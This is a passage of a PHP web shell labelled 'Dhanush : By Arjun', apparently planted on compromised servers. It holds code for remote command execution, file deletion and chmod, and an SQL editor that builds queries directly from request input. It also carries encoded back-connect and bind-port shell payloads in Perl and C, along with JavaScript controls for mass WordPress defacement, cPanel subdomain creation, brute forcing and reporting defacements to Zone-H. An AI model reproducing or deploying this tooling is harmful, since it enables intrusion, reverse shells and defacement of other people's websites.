5120 $row = mysql_fetch_array($sql);
5121 $row = $row['COLUMN_NAME'];
5122 $rowid = $_GET[$row];
5123
5124 $pResult = mysql_list_fields( $dbname, $tablename );
5125 $num = mysql_num_fields( $pResult );
5126
5127 $key = "";
5128 for( $i = 0; $i < $num; $i++ )
5129 {
5130 $field = mysql_fetch_field( $pResult, $i );
5131 if( $field->primary_key == 1 )
5132 if( $field->numeric == 1 )
5133 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
5134 else
5135 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
5136 }
5137 $key = substr( $key, 0, strlen($key)-4 );
5138
5139 mysql_select_db( $dbname, $mysqlHandle );
5140 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
5141 $data = mysql_fetch_array( $pResult );
5142
5143 echo "<table cellspacing=1 cellpadding=2 border=1>
5144 ";
5145 echo "<tr>
5146 ";
5147 echo "<th>Name</th>
5148 ";
5149 echo "<th>Type</th>
5150 ";
5151 echo "<th>Function</th>
5152 ";
5153 echo "<th>Data</th>
5154 ";
5155 echo "</tr>
5156 ";
5157
5158 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
5159 $num = mysql_num_rows( $pResult );
5160
5161 $pResultLen = mysql_list_fields( $dbname, $tablename );
5162 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
5163 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
5164 for( $i = 0; $i < $num; $i++ )
5165 {
5166 $field = mysql_fetch_array( $pResult );
5167 $fieldname = $field["Field"];
5168 $fieldtype = $field["Type"];
5169 $len = mysql_field_len( $pResultLen, $i );
5170
5171 echo "<tr>";
5172 echo "<td>$fieldname</td>";
5173 echo "<td>".$field["Type"]."</td>";
5174 echo "<td>
5175 ";
5176 echo "<select name=${fieldname}_function class=sbox>
5177 ";
5178 echo "<option>
5179 ";
5180 echo "<option>ASCII
5181 ";
5182 echo "<option>CHAR
5183 ";
5184 echo "<option>SOUNDEX
5185 ";
5186 echo "<option>CURDATE
5187 ";
5188 echo "<option>CURTIME
5189 ";
5190 echo "<option>FROM_DAYS
5191 ";
5192 echo "<option>FROM_UNIXTIME
5193 ";
5194 echo "<option>NOW
5195 ";
5196 echo "<option>PASSWORD
5197 ";
5198 echo "<option>PERIOD_ADD
5199 ";
5200 echo "<option>PERIOD_DIFF
5201 ";
5202 echo "<option>TO_DAYS
5203 ";
5204 echo "<option>USER
5205 ";
5206 echo "<option>WEEKDAY
5207 ";
5208 echo "<option>RAND
5209 ";
5210 echo "</select>
5211 ";
5212 echo "</td>
5213 ";
5214 $value = htmlspecialchars($data[$i]);
5215 $type = strtok( $fieldtype, " (,)
5216 " );
5217 if( $type == "enum" || $type == "set" )
5218 {
5219 echo "<td>
5220 ";
5221 if( $type == "enum" )
5222 echo "<select name=$fieldname class=box>
5223 ";
5224 else if( $type == "set" )
5225 echo "<select name=$fieldname size=4 class=box multiple>
5226 ";
5227 while( $str = strtok( "'" ) )
5228 {
5229 if( $value == $str )
5230 echo "<option selected>$str
5231 ";
5232 else
5233 echo "<option>$str
5234 ";
5235 strtok( "'" );
5236 }
5237 echo "</select>
5238 ";
5239 echo "</td>
5240 ";
5241 }
5242 else
5243 {
5244 if( $len < 40 )
5245 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=dhanush_$fieldname value=\"$value\" class=box></td>
5246 ";
5247 else
5248 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>
5249 ";
5250 }
5251 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
5252 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
5253 echo "</tr>";
5254 }
5255 $fundata1=eregi_replace(',$', '', $fundata1);
5256 $fundata2=eregi_replace(',$', '', $fundata2);
5257 echo "</table><p>
5258 ";
5259 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>
5260 ";
5261 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>
5262 ";
5263 echo "</form>
5264 ";
5265 }
5266 }
5267 // Edit Submit Table Data
5268 else if($_REQUEST['action'] == "editsubmitData")
5269 {
5270 $dbserver = $_COOKIE["dbserver"];
5271 $dbuser = $_COOKIE["dbuser"];
5272 $dbpass = $_COOKIE["dbpass"];
5273 $dbname = $_POST['dbname'];
5274 $tablename = $_POST['tablename'];
5275
5276 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5277 mysql_select_db($dbname);
5278
5279 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
5280 $row = mysql_fetch_array($sql);
5281 $row = $row['COLUMN_NAME'];
5282 $rowid = $_POST[$row];
5283
5284 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
5285 $num = mysql_num_rows( $pResult );
5286
5287 $rowcount = $num;
5288
5289 $pResultLen = mysql_list_fields( $dbname, $tablename );
5290
5291 for( $i = 0; $i < $num; $i++ )
5292 {
5293 $field = mysql_fetch_array( $pResult );
5294 $fieldname = $field["Field"];
5295 $arrdata = $_REQUEST[$fieldname];
5296
5297
5298 $str .= " " . $fieldname . " = '" . $arrdata . "'";
5299 $rowcount--;
5300 if($rowcount != 0)
5301 $str .= ",";
5302 }
5303
5304 $str = "update $tablename set" . $str . " where $row=$rowid";
5305 mysql_query($str);
5306 ?><div id="showsql"></div><?php
5307 }
5308 else if(isset($_GET['logoutdb']))
5309 {
5310 setcookie("dbserver",time() - 60*60);
5311 setcookie("dbuser",time() - 60*60);
5312 setcookie("dbpass",time() - 60*60);
5313 header("Location:$self");
5314 }
5315 // Insert Table Data
5316 else if($_REQUEST['action'] == "insertdata")
5317 {
5318 $dbserver = $_COOKIE["dbserver"];
5319 $dbuser = $_COOKIE["dbuser"];
5320 $dbpass = $_COOKIE["dbpass"];
5321 $dbname = $_POST['dbname'];
5322 $tablename = $_POST['tablename'];
5323
5324 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5325 mysql_select_db($dbname);
5326
5327 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
5328 $row = mysql_fetch_array($sql);
5329 $row = $row['COLUMN_NAME'];
5330 $rowid = $_POST[$row];
5331
5332 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
5333 $num = mysql_num_rows( $pResult );
5334
5335 $rowcount = $num;
5336
5337 $pResultLen = mysql_list_fields( $dbname, $tablename );
5338
5339 for( $i = 0; $i < $num; $i++ )
5340 {
5341 $field = mysql_fetch_array( $pResult );
5342 $fieldname = $field["Field"];
5343 $arrdata = $_REQUEST[$fieldname];
5344
5345 $str1 .= "".$fieldname . ",";
5346 $str2 .= "'".$arrdata . "',";
5347 $rowcount--;
5348 if($rowcount != 0)
5349 {
5350 //$str1 .= $fieldname . ",";
5351 //$str2 .= $arrdata . ",";
5352 }
5353 }
5354 $str1=eregi_replace(',$', '', $str1);
5355 $str2=eregi_replace(',$', '', $str2);
5356 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
5357 mysql_query($str);
5358
5359 ?><div id="showsql"></div><?php
5360 }
5361 else if(isset($_POST['choice']))
5362 {
5363 if($_POST['choice'] == "delete")
5364 {
5365 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
5366 $actbox = $_POST["actbox"];
5367 foreach ($actbox as $myv)
5368 $myv = explode(",",$myv);
5369 foreach ($myv as $v)
5370 {
5371 if(is_file($v))
5372 {
5373 if(unlink($v))
5374 {
5375 echo "<br><center><font class=txt >File $v Deleted Successfully</font></center>";
5376 }
5377 else
5378 echo "<br><center><font >Cannot Delete File $v</font></center>";
5379 }
5380 else if(is_dir($v))
5381 {
5382 rrmdir($v);
5383 }
5384 }
5385 echo '<br>';
5386 }
5387 else if($_POST['choice'] == "chmod")
5388 { ?>
5389 <BR><form id="chform" method="POST" ><?php
5390 $actbox1 = $_POST['actbox'];
5391 foreach ($actbox1 as $v)
5392 { ?>
5393 <input type="hidden" name="actbox3[]" value="<?php echo $v; ?>">
5394 <?php }
5395 ?>
5396 <table class="tbl" align="center" border="1" style="width:40%;">
5397 <tr>
5398 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
5399 </tr>
5400 <tr>
5401 <td colspan="2" align="center" style="height:60px">
5402 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" />
5403 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" /></form></center>
5404 </td>
5405 </tr>
5406 </table>
5407
5408 </form> <?php
5409 }
5410 else if($_POST['choice'] == "changefileperms")
5411 {
5412 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
5413 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
5414 {
5415 $actbox = $_POST["actbox"];
5416 foreach ($actbox as $myv)
5417 $myv = explode(",",$myv);
5418 foreach ($myv as $v)
5419 {
5420 if(is_file($v) || is_dir($v))
5421 {
5422 $perms = 0;
5423 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
5424 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
5425 echo "<div align=left style=width:80%;>";
5426 if(@chmod($v,$perms))
5427 echo "<font class=txt>File $v Permissions Changed Successfully</font>";
5428 else
5429 echo "Cannot Change $v File Permissions";
5430 echo "</div>";
5431 }
5432 }
5433 }
5434 }
5435 else if($_POST['choice'] == "compre")
5436 {
5437 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
5438 $actbox = $_POST["actbox"];
5439 foreach ($actbox as $v)
5440 {
5441 if(is_file($v))
5442 {
5443 $zip = new ZipArchive();
5444 $filename= basename($v) . '.zip';
5445 if(($zip->open($filename, ZipArchive::CREATE))!==true)
5446 { echo '<br><font >Error: Unable to create zip file for $v</font>';}
5447 else {echo "<br><font class=txt >File $v Compressed successfully</font>";}
5448 $zip->addFile(basename($v));
5449 $zip->close();
5450 }
5451 else if(is_dir($v))
5452 {
5453 if($os == "Linux")
5454 {
5455 $filename= basename($v);
5456 execmd("tar --create --recursion --file=$filename.tar $v");
5457 echo "<br><font class=txt >File $v Compressed successfully as $v.tar</font>";
5458 }
5459 }
5460 }
5461 echo '<BR><BR>';
5462 }
5463 else if($_POST['choice'] == "uncompre")
5464 {
5465 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
5466 $actbox = $_POST["actbox"];
5467 foreach ($actbox as $v)
5468 {
5469 if(is_file($v) || is_dir($v))
5470 {
5471 $zip = new ZipArchive;
5472 $filename= basename($v);
5473 $res = $zip->open($filename);
5474 if ($res === TRUE)
5475 {
5476 $pieces = explode(".",$filename);
5477 $zip->extractTo($pieces[0]);
5478 $zip->close();
5479 echo "<br><font class=txt >File $v Unzipped successfully</font>";
5480 } else
5481 echo "<br><font >Error: Unable to Unzip file $v</font>";
5482 }
5483 }
5484 echo '<BR><BR>';
5485 }
5486 }
5487 else if(isset($_GET['sitename']))
5488 {
5489 $sitename = str_replace("http://","",$_GET['sitename']);
5490 $sitename = str_replace("http://www.","",$sitename);
5491 $sitename = str_replace("www.","",$sitename);
5492
5493 $show = myexe("ls -la /etc/valiases/".$sitename);
5494 if(!empty($show))
5495 echo $show;
5496 else
5497 echo "Cannot get the username";
5498 }
5499 else if(isset($_GET['mydata']))
5500 {
5501 listdatabase();
5502 }
5503 else if(isset($_GET['home']))
5504 {
5505 mainfun($_GET['home']);
5506 }
5507 else if(isset($_GET['dir']))
5508 {
5509 mainfun($_GET['myfilepath']);
5510 }
5511 else if(isset($_GET['mydirpath']))
5512 {
5513 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
5514 }
5515 else
5516 {
5517 $back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
5518
5519 $backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
5520
5521 $bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
5522
5523 $bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
5524
5525 ?>
5526 <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
5527 <title>Dhanush : By Arjun</title>
5528 <script type="text/javascript">
5529 checked = false;
5530 var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
5531 function checkedAll ()
5532 {
5533 if (checked == false){checked = true}else{checked = false}
5534 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
5535 {
5536 document.getElementById('myform').elements[i].checked = checked;
5537 }
5538 }
5539 function createsubdomain(cpaneluser,cpanelpass,noofsubdomain,subindex)
5540 {
5541 var params = "cpaneluser="+cpaneluser+"&cpanelpass="+cpanelpass+"&noofsubdomain="+noofsubdomain+"&subindex="+subindex;
5542 document.getElementById("showmydata").innerHTML=waitstate;
5543 var ajaxRequest;
5544 ajaxRequest = new XMLHttpRequest();
5545
5546 ajaxRequest.onreadystatechange = function()
5547 {
5548 if(ajaxRequest.readyState == 3)
5549 {
5550 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5551 }
5552 }
5553
5554 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5555 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5556 ajaxRequest.send(params);
5557 }
5558 function massdeface(script,masswpdef,wpsym)
5559 {
5560 var params = "massscript="+script+"&massdef="+masswpdef+"&wpsym="+wpsym;
5561 document.getElementById("showdef").innerHTML="<center><marquee scrollamount=4 width=150>It may take long time. Wait....</marquee></center>";
5562 var ajaxRequest;
5563 ajaxRequest = new XMLHttpRequest();
5564
5565 ajaxRequest.onreadystatechange = function()
5566 {
5567 if(ajaxRequest.readyState == 3)
5568 {
5569 document.getElementById("showdef").innerHTML=ajaxRequest.responseText;
5570 }
5571 }
5572
5573 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5574 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5575 ajaxRequest.send(params);
5576 }
5577 function urlchange(myfilepath)
5578 {
5579 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
5580 splitter = "<?php echo addslashes($directorysperator); ?>";
5581 mypath = mpath = myfilepath.split(splitter);
5582 <?php if($os == "Linux") { ?>
5583 r = "/";
5584 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
5585 <?php } ?>
5586 for (i = 0; i < mypath.length; i++)
5587 {
5588 if(mypath[i] == "")
5589 continue;
5590 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
5591
5592 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
5593 }
5594 myurl = myurl.replace(/\/g,"\");
5595 return myurl;
5596 }
5597 function wrtblDIR(mydirpath)
5598 {
5599 var ajaxRequest;
5600 ajaxRequest = new XMLHttpRequest();
5601
5602 ajaxRequest.onreadystatechange = function()
5603 {
5604 if(ajaxRequest.readyState == 4)
5605 {
5606 for(i=0;i<=3;i++)
5607 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
5608 }
5609 }
5610
5611 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?&mydirpath="+mydirpath, true);
5612 ajaxRequest.send(null);
5613 }
5614 function setpath(myfilpath)
5615 {
5616 wrtblDIR(myfilpath);
5617 document.getElementById("path").value=myfilpath;
5618 document.getElementById("createfile").value=myfilpath;
5619 document.getElementById("createfolder").value=myfilpath;
5620 document.getElementById("createfolder").value=myfilpath;
5621 document.getElementById("readfile").value=myfilpath;
5622 document.getElementById("readdir").value=myfilpath;
5623 document.getElementById("exepath").value=myfilpath;
5624 document.getElementById("auexepath").value=myfilpath;
5625 document.getElementById("showdir").innerHTML="";
5626 }
5627 function changedir(myaction,myfilepath)
5628 {
5629 var myurl = urlchange(myfilepath);
5630 document.getElementById("showmaindata").innerHTML=waitstate;
5631 var ajaxRequest;
5632 ajaxRequest = new XMLHttpRequest();
5633
5634 ajaxRequest.onreadystatechange = function()
5635 {
5636 if(ajaxRequest.readyState == 4)
5637 {
5638 setpath(myfilepath);
5639 document.getElementById("crdir").innerHTML=myurl;
5640 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5641 }
5642 }
5643
5644 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
5645 ajaxRequest.send(null);
5646 }
5647 function gethome(myaction,mydir)
5648 {
5649 var myurl = urlchange(mydir);
5650 document.getElementById("showmaindata").innerHTML=waitstate;
5651 var ajaxRequest;
5652 ajaxRequest = new XMLHttpRequest();
5653
5654 ajaxRequest.onreadystatechange = function()
5655 {
5656 if(ajaxRequest.readyState == 4)
5657 {
5658 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5659 setpath(mydir);
5660 document.getElementById("crdir").innerHTML=myurl;
5661 }
5662 }
5663
5664 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
5665 ajaxRequest.send(null);
5666 }
5667 function getname(sitename)
5668 {
5669 document.getElementById("showsite").innerHTML=waitstate;
5670 var ajaxRequest;
5671 ajaxRequest = new XMLHttpRequest();
5672
5673 ajaxRequest.onreadystatechange = function()
5674 {
5675 if(ajaxRequest.readyState == 4)
5676 {
5677 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
5678 }
5679 }
5680
5681 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
5682 ajaxRequest.send(null);
5683 }
5684 function myaction(myfileaction,chmode)
5685 {
5686 var mytype = document.getElementsByName('actbox[]');
5687 var mychoice = new Array();
5688
5689 for (var i = 0, length = mytype.length; i < length; i++)
5690 {
5691 if (mytype[i].checked)
5692 mychoice[i] = mytype[i].value;
5693 }
5694
5695 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
5696
5697 document.getElementById("showmydata").className = "fixedbox";
5698 document.getElementById("showmydata").innerHTML=waitstate;
5699 var ajaxRequest;
5700 ajaxRequest = new XMLHttpRequest();
5701
5702 ajaxRequest.onreadystatechange = function()
5703 {
5704 if(ajaxRequest.readyState == 4)
5705 {
5706 gethome('home','<?php echo addslashes($dir); ?>');
5707 }
5708 }
5709
5710 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5711 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5712 ajaxRequest.send(params);
5713 }
5714 function editdata()
5715 {
5716 var result = "", // initialize list
5717 i,dbname,tablename;
5718 // iterate through arguments
5719 for (i = 1; i < arguments.length; i++)
5720 {
5721 if(i%2 == 0)
5722 result += arguments[i]+'=';
5723 else
5724 result += arguments[i]+'&';
5725 }
5726 result = result.slice(0, -1);
5727
5728 dbname = arguments[3];
5729 tablename = arguments[5];
5730 var result=result.replace(/dhanush_/g,"");
5731 var params = arguments[0]+"="+result;
5732
5733 document.getElementById("showsql").innerHTML=waitstate;
5734 var ajaxRequest;
5735 ajaxRequest = new XMLHttpRequest();
5736
5737 ajaxRequest.onreadystatechange = function()
5738 {
5739 if(ajaxRequest.readyState == 4)
5740 {
5741 viewtables('listTables',dbname,tablename);
5742 }
5743 }
5744
5745 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5746 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5747 ajaxRequest.send(params);
5748 }
5749 function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
5750 {
5751 document.getElementById("showsql").innerHTML=waitstate;
5752 var ajaxRequest;
5753 ajaxRequest = new XMLHttpRequest();
5754
5755 ajaxRequest.onreadystatechange = function()
5756 {
5757 if(ajaxRequest.readyState == 4)
5758 {
5759 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
5760 }
5761 }
5762
5763 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
5764 ajaxRequest.send(null);
5765 }
5766 function mydatabase(server,username,password)
5767 {
5768 document.getElementById("showsql").innerHTML=waitstate;
5769 var ajaxRequest;
5770 ajaxRequest = new XMLHttpRequest();
5771
5772 ajaxRequest.onreadystatechange = function()
5773 {
5774 if(ajaxRequest.readyState == 4)
5775 {
5776 mydatago();
5777 }
5778 }
5779
5780 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
5781 ajaxRequest.send(null);
5782 }
5783 function mydatago()
5784 {
5785 var ajaxRequest;
5786 ajaxRequest = new XMLHttpRequest();
5787
5788 ajaxRequest.onreadystatechange = function()
5789 {
5790 if(ajaxRequest.readyState == 4)
5791 {
5792 document.getElementById("datatable").style.display = 'none';
5793 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
5794 }
5795 }
5796
5797 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
5798 ajaxRequest.send(null);
5799 }
5800 function bruteforce(prototype,serverport,login,dict)
5801 {
5802 var mytype = document.getElementsByName('mytype');
5803 for (var i = 0, length = mytype.length; i < length; i++)
5804 {
5805 if (mytype[i].checked)
5806 break;
5807 }
5808 var getreverse = 0;
5809 if(document.getElementById('reverse').checked == true)
5810 getreverse = 1;
5811 else
5812 getreverse = 0;
5813
5814 document.getElementById("showbrute").innerHTML=waitstate;
5815 var ajaxRequest;
5816 ajaxRequest = new XMLHttpRequest();
5817
5818 ajaxRequest.onreadystatechange = function()
5819 {
5820 if(ajaxRequest.readyState == 4)
5821 {
5822 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
5823 }
5824 }
5825
5826 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
5827 ajaxRequest.send(null);
5828 }
5829 function executemyfile(action,executepath,execute)
5830 {
5831 document.getElementById("showmydata").className = "fixedbox";
5832 document.getElementById("showmydata").innerHTML=waitstate;
5833 var ajaxRequest;
5834 ajaxRequest = new XMLHttpRequest();
5835
5836 ajaxRequest.onreadystatechange = function()
5837 {
5838 if(ajaxRequest.readyState == 4)
5839 {
5840 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5841 }
5842 }
5843
5844 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
5845 ajaxRequest.send(null);
5846 }
5847 function maindata(myaction,dir)
5848 {
5849 document.getElementById("showmaindata").innerHTML=waitstate;
5850 var ajaxRequest;
5851 ajaxRequest = new XMLHttpRequest();
5852
5853 ajaxRequest.onreadystatechange = function()
5854 {
5855 if(ajaxRequest.readyState == 4)
5856 {
5857 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5858 document.getElementById("showdir").innerHTML="";
5859 }
5860 }
5861
5862 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
5863 ajaxRequest.send(null);
5864 }
5865 function manuallyscriptfn(sctype,passwd)
5866 {
5867 var message = encodeURIComponent(passwd);
5868 var params = sctype+"="+sctype+"&passwd="+passwd;
5869 document.getElementById("showdata").innerHTML=waitstate;
5870 var ajaxRequest;
5871 ajaxRequest = new XMLHttpRequest();
5872
5873 ajaxRequest.onreadystatechange = function()
5874 {
5875 if(ajaxRequest.readyState == 3)
5876 {
5877 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5878 }
5879 }
5880
5881 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5882 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5883 ajaxRequest.send(params);
5884 }
5885 function my404page(message)
5886 {
5887 var message = encodeURIComponent(message);
5888 var params = "404page=404page&message="+message;
5889 document.getElementById("showdata").innerHTML=waitstate;
5890 var ajaxRequest;
5891 ajaxRequest = new XMLHttpRequest();
5892
5893 ajaxRequest.onreadystatechange = function()
5894 {
5895 if(ajaxRequest.readyState == 4)
5896 {
5897 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5898 }
5899 }
5900
5901 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5902 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5903 ajaxRequest.send(params);
5904 }
5905 function executemyfn(executepath,executemycmd)
5906 {
5907 var ajaxRequest,app;
5908 ajaxRequest = new XMLHttpRequest();
5909
5910 ajaxRequest.onreadystatechange = function()
5911 {
5912 if(ajaxRequest.readyState == 4)
5913 {
5914 app = "$ " + executemycmd + " : " + ajaxRequest.responseText + "
5915 ";
5916 document.getElementById("showexecute").innerHTML=app+document.getElementById("showexecute").innerHTML;
5917 }
5918 }
5919
5920 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
5921 ajaxRequest.send(null);
5922 }
5923 function zoneh(defacer,hackmode,reason,domain)
5924 {
5925 var domain = encodeURIComponent(domain);
5926 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
5927 document.getElementById("showzone").innerHTML=waitstate;
5928 var ajaxRequest;
5929 ajaxRequest = new XMLHttpRequest();
5930
